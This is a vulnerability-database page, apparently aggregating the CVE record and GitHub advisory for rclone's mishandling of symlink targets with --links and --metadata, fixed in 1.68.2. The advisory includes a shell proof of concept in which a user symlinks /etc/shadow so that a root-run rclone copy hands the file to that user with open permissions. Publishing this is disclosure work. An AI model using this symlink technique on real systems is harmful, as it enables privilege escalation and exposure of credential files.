CVE-2024-52522

Vulnerability from cvelistv5

Published

2024-11-15 17:15

Modified

2024-11-21 14:56

Severity ?

5.4 (Medium) - CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Summary

Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files, compromising system integrity, confidentiality, and availability. This vulnerability is fixed in 1.68.2.

References

▼	URL	Tags
	security-advisories@github.com	https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0
	security-advisories@github.com	https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv

Impacted products

Vendor

Product

Version

▼

rclone

Version: >= 1.59.0, < 1.68.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-52522",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-15T18:25:56.656814Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-21T14:56:00.193Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "rclone",
          "vendor": "rclone",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.59.0, \u003c 1.68.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files, compromising system integrity, confidentiality, and availability. This vulnerability is fixed in 1.68.2."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "LOCAL",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "userInteraction": "ACTIVE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-59",
              "description": "CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-61",
              "description": "CWE-61: UNIX Symbolic Link (Symlink) Following",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-281",
              "description": "CWE-281: Improper Preservation of Permissions",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-11-15T17:15:43.357Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv"
        },
        {
          "name": "https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0"
        }
      ],
      "source": {
        "advisory": "GHSA-hrxh-9w67-g4cv",
        "discovery": "UNKNOWN"
      },
      "title": "Rclone  Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-52522",
    "datePublished": "2024-11-15T17:15:43.357Z",
    "dateReserved": "2024-11-11T18:49:23.559Z",
    "dateUpdated": "2024-11-21T14:56:00.193Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-52522\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-11-15T18:15:30.643\",\"lastModified\":\"2024-11-21T15:15:33.637\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files, compromising system integrity, confidentiality, and availability. This vulnerability is fixed in 1.68.2.\"},{\"lang\":\"es\",\"value\":\"Rclone es un programa de l\u00ednea de comandos para sincronizar archivos y directorios desde y hacia diferentes proveedores de almacenamiento en la nube. El manejo inseguro de enlaces simb\u00f3licos con --links y --metadata en rclone mientras se copia al disco local permite a los usuarios sin privilegios modificar indirectamente la propiedad y los permisos en los archivos de destino de los enlaces simb\u00f3licos cuando un superusuario o un proceso privilegiado realiza una copia. Esta vulnerabilidad podr\u00eda permitir la escalada de privilegios y el acceso no autorizado a archivos cr\u00edticos del sistema, lo que compromete la integridad, la confidencialidad y la disponibilidad del sistema. Esta vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 1.68.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"ACTIVE\",\"vulnerableSystemConfidentiality\":\"HIGH\",\"vulnerableSystemIntegrity\":\"HIGH\",\"vulnerableSystemAvailability\":\"HIGH\",\"subsequentSystemConfidentiality\":\"LOW\",\"subsequentSystemIntegrity\":\"LOW\",\"subsequentSystemAvailability\":\"LOW\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirements\":\"NOT_DEFINED\",\"integrityRequirements\":\"NOT_DEFINED\",\"availabilityRequirements\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnerableSystemConfidentiality\":\"NOT_DEFINED\",\"modifiedVulnerableSystemIntegrity\":\"NOT_DEFINED\",\"modifiedVulnerableSystemAvailability\":\"NOT_DEFINED\",\"modifiedSubsequentSystemConfidentiality\":\"NOT_DEFINED\",\"modifiedSubsequentSystemIntegrity\":\"NOT_DEFINED\",\"modifiedSubsequentSystemAvailability\":\"NOT_DEFINED\",\"safety\":\"NOT_DEFINED\",\"automatable\":\"NOT_DEFINED\",\"recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-59\"},{\"lang\":\"en\",\"value\":\"CWE-61\"},{\"lang\":\"en\",\"value\":\"CWE-281\"}]}],\"references\":[{\"url\":\"https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

ghsa-hrxh-9w67-g4cv

Vulnerability from github

Published

2024-11-19 20:36

Modified

2024-11-19 20:36

Severity ?

5.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
5.4 (Medium) - CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Summary

Rclone has Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata

Details

tl;dr:

unprivileged user creates a symlink to /etc/sudoers, /etc/shadow or similar and waits for a privileged user or process to copy/backup/mirror users data (using --links and --metadata). unprivileged user now owns /etc/sudoers.

Summary

Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files (e.g., /etc/shadow), compromising system integrity, confidentiality, and availability.

For instance, an unprivileged user could set a symlink to a sensitive file within their home directory, waiting for an administrator or automated process (e.g., a cron job running with elevated privileges) to copy their files with rclone using the --links and --metadata options. Upon copying, rclone will incorrectly apply chown and chmod to the symlink’s target file rather than just the symlink itself, resulting in ownership and permission changes on the sensitive file.

Who is affected

If you are not using --metadata and --links and copying files to the local backend you are not affected by this issue.

If you are using --metadata and -links and copying files to the local backend but not as a superuser, then this will manifest itself as a bug by setting incorrect permissions.

If you are using --metadata and -links and copying files to the local backend but as a superuser then this could affect you.

Details

When copying directories containing symlinks with rclone using the --links and --metadata options, rclone mistakenly applies chown and chmod operations to the target of the symlink instead of the symlink itself. As a result, ownership and permissions on sensitive system files (e.g., /etc/shadow) may be altered if they are the target of any symlink within the copied directory structure. This allows users to affect the permissions and ownership of files they should not have access to, resulting in privilege escalation and potential system compromise.

PoC

```

Create a directory to simulate a user home directory

root@workstation:~# mkdir -p /tmp/home/user1 root@workstation:~# sudo chown user1:user1 /tmp/home/user1

As user1, create a symlink to /etc/shadow within their home directory

root@workstation:~# sudo -u user1 ln -s /etc/shadow /tmp/home/user1/shadow_link

List permissions on the original files

root@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow ----------. 1 root root 1283 Nov 5 13:30 /etc/shadow lrwxrwxrwx. 1 user1 user1 11 Nov 5 13:56 /tmp/home/user1/shadow_link -> /etc/shadow

Copy the directory structure with rclone

root@workstation:~# rclone copy /tmp/home /tmp/home_new --links --metadata --log-level=DEBUG 2024/11/05 13:56:53 DEBUG : rclone: Version "v1.68.1" starting with parameters ["rclone" "copy" "/tmp/home" "/tmp/home_new" "--links" "--metadata" "--log-level=DEBUG"] 2024/11/05 13:56:53 DEBUG : Creating backend with remote "/tmp/home" 2024/11/05 13:56:53 NOTICE: Config file "/root/.config/rclone/rclone.conf" not found - using defaults 2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding "{b6816}" suffix to name 2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item "/tmp/home" to be canonical "local{b6816}:/tmp/home" 2024/11/05 13:56:53 DEBUG : Creating backend with remote "/tmp/home_new" 2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding "{b6816}" suffix to name 2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item "/tmp/home_new" to be canonical "local{b6816}:/tmp/home_new" 2024/11/05 13:56:53 DEBUG : Added delayed dir = "user1", newDst= 2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: Need to transfer - File not found at Destination 2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: md5 = 2fe8599cb25a0c790213d39b3be97c27 OK 2024/11/05 13:56:53 INFO : user1/shadow_link.rclonelink: Copied (new) 2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for checks to finish 2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for transfers to finish 2024/11/05 13:56:53 INFO : user1: Updated directory metadata 2024/11/05 13:56:53 INFO : Transferred: 11 B / 11 B, 100%, 0 B/s, ETA - Transferred: 1 / 1, 100% Elapsed time: 0.0s

2024/11/05 13:56:53 DEBUG : 6 go routines active

List permissions again

root@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow /tmp/home_new/user1/shadow_link -rwxrwxrwx. 1 user1 user1 1283 Nov 5 13:30 /etc/shadow # Wrong, very wrong. Should be root:root and 0000. lrwxrwxrwx. 1 root root 11 Nov 5 13:56 /tmp/home_new/user1/shadow_link -> /etc/shadow # Wrong too, should be user1:user1 lrwxrwxrwx. 1 user1 user1 11 Nov 5 13:56 /tmp/home/user1/shadow_link -> /etc/shadow

Fix /etc/shadow and clean up

root@workstation:~# chown root:root /etc/shadow root@workstation:~# chmod 000 /etc/shadow root@workstation:~# rm -rf /tmp/home /tmp/home_new ```

Impact

Type of Vulnerability: Improper permissions and ownership handling on symlink targets (Insecure Handling of Symlinks)

Impact: This vulnerability allows unprivileged users to modify permissions and ownership of sensitive system files by creating symlinks to those files in directories that are subsequently copied by an administrator with rclone --links --metadata. This can lead to unauthorized access, privilege escalation, and potential system compromise.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/rclone/rclone"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.59.0"
            },
            {
              "fixed": "1.68.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-52522"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-281"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-19T20:36:02Z",
    "nvd_published_at": "2024-11-15T18:15:30Z",
    "severity": "MODERATE"
  },
  "details": "### **tl;dr:**\n\nunprivileged user creates a symlink to /etc/sudoers, /etc/shadow or similar and waits for a privileged user or process to copy/backup/mirror users data (using `--links` and `--metadata`). unprivileged user now owns /etc/sudoers.\n\n### Summary\n\nInsecure handling of symlinks with `--links` and `--metadata` in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files (e.g., /etc/shadow), compromising system integrity, confidentiality, and availability.\n\nFor instance, an unprivileged user could set a symlink to a sensitive file within their home directory, waiting for an administrator or automated process (e.g., a cron job running with elevated privileges) to copy their files with rclone using the --links and --metadata options. Upon copying, rclone will incorrectly apply chown and chmod to the symlink\u2019s target file rather than just the symlink itself, resulting in ownership and permission changes on the sensitive file.\n\n### Who is affected\n\nIf you are not using `--metadata` **and** `--links` **and** copying files **to** the local backend you are not affected by this issue.\n\nIf you are using `--metadata` and `-links` and copying files to the local backend but not as a superuser, then this will manifest itself as a bug by setting incorrect permissions.\n\nIf you are using `--metadata` and `-links` and copying files to the local backend but as a superuser then this could affect you.\n\n### Details\n\nWhen copying directories containing symlinks with rclone using the --links and --metadata options, rclone mistakenly applies chown and chmod operations to the target of the symlink instead of the symlink itself. As a result, ownership and permissions on sensitive system files (e.g., /etc/shadow) may be altered if they are the target of any symlink within the copied directory structure. This allows users to affect the permissions and ownership of files they should not have access to, resulting in privilege escalation and potential system compromise.\n\n### PoC\n\n```\n# Create a directory to simulate a user home directory\nroot@workstation:~# mkdir -p /tmp/home/user1\nroot@workstation:~# sudo chown user1:user1 /tmp/home/user1\n```\n```\n# As user1, create a symlink to /etc/shadow within their home directory\nroot@workstation:~# sudo -u user1 ln -s /etc/shadow /tmp/home/user1/shadow_link\n```\n```\n# List permissions on the original files\nroot@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow\n----------. 1 root  root  1283 Nov  5 13:30 /etc/shadow\nlrwxrwxrwx. 1 user1 user1   11 Nov  5 13:56 /tmp/home/user1/shadow_link -\u003e /etc/shadow\n```\n```\n# Copy the directory structure with rclone\nroot@workstation:~# rclone copy /tmp/home /tmp/home_new --links --metadata --log-level=DEBUG\n2024/11/05 13:56:53 DEBUG : rclone: Version \"v1.68.1\" starting with parameters [\"rclone\" \"copy\" \"/tmp/home\" \"/tmp/home_new\" \"--links\" \"--metadata\" \"--log-level=DEBUG\"]\n2024/11/05 13:56:53 DEBUG : Creating backend with remote \"/tmp/home\"\n2024/11/05 13:56:53 NOTICE: Config file \"/root/.config/rclone/rclone.conf\" not found - using defaults\n2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding \"{b6816}\" suffix to name\n2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item \"/tmp/home\" to be canonical \"local{b6816}:/tmp/home\"\n2024/11/05 13:56:53 DEBUG : Creating backend with remote \"/tmp/home_new\"\n2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding \"{b6816}\" suffix to name\n2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item \"/tmp/home_new\" to be canonical \"local{b6816}:/tmp/home_new\"\n2024/11/05 13:56:53 DEBUG : Added delayed dir = \"user1\", newDst=\u003cnil\u003e\n2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: Need to transfer - File not found at Destination\n2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: md5 = 2fe8599cb25a0c790213d39b3be97c27 OK\n2024/11/05 13:56:53 INFO  : user1/shadow_link.rclonelink: Copied (new)\n2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for checks to finish\n2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for transfers to finish\n2024/11/05 13:56:53 INFO  : user1: Updated directory metadata\n2024/11/05 13:56:53 INFO  :\nTransferred:             11 B / 11 B, 100%, 0 B/s, ETA -\nTransferred:            1 / 1, 100%\nElapsed time:         0.0s\n\n2024/11/05 13:56:53 DEBUG : 6 go routines active\n```\n```\n# List permissions again\nroot@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow /tmp/home_new/user1/shadow_link\n-rwxrwxrwx. 1 user1 user1 1283 Nov  5 13:30 /etc/shadow                                                 # Wrong, very wrong. Should be root:root and 0000.\nlrwxrwxrwx. 1 root  root    11 Nov  5 13:56 /tmp/home_new/user1/shadow_link -\u003e /etc/shadow              # Wrong too, should be user1:user1\nlrwxrwxrwx. 1 user1 user1   11 Nov  5 13:56 /tmp/home/user1/shadow_link -\u003e /etc/shadow\n```\n```\n# Fix /etc/shadow and clean up\nroot@workstation:~# chown root:root /etc/shadow\nroot@workstation:~# chmod 000 /etc/shadow\nroot@workstation:~# rm -rf /tmp/home /tmp/home_new\n```\n### Impact\nType of Vulnerability: Improper permissions and ownership handling on symlink targets (Insecure Handling of Symlinks)\n\nImpact: This vulnerability allows unprivileged users to modify permissions and ownership of sensitive system files by creating symlinks to those files in directories that are subsequently copied by an administrator with rclone --links --metadata. This can lead to unauthorized access, privilege escalation, and potential system compromise.",
  "id": "GHSA-hrxh-9w67-g4cv",
  "modified": "2024-11-19T20:36:02Z",
  "published": "2024-11-19T20:36:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52522"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rclone/rclone"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Rclone has Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2024-52522

Vulnerability from cvelistv5

ghsa-hrxh-9w67-g4cv

Vulnerability from github

tl;dr:

Summary

Who is affected

Details

PoC

Create a directory to simulate a user home directory

As user1, create a symlink to /etc/shadow within their home directory

List permissions on the original files

Copy the directory structure with rclone

List permissions again

Fix /etc/shadow and clean up

Impact

Tags

Sightings

Nomenclature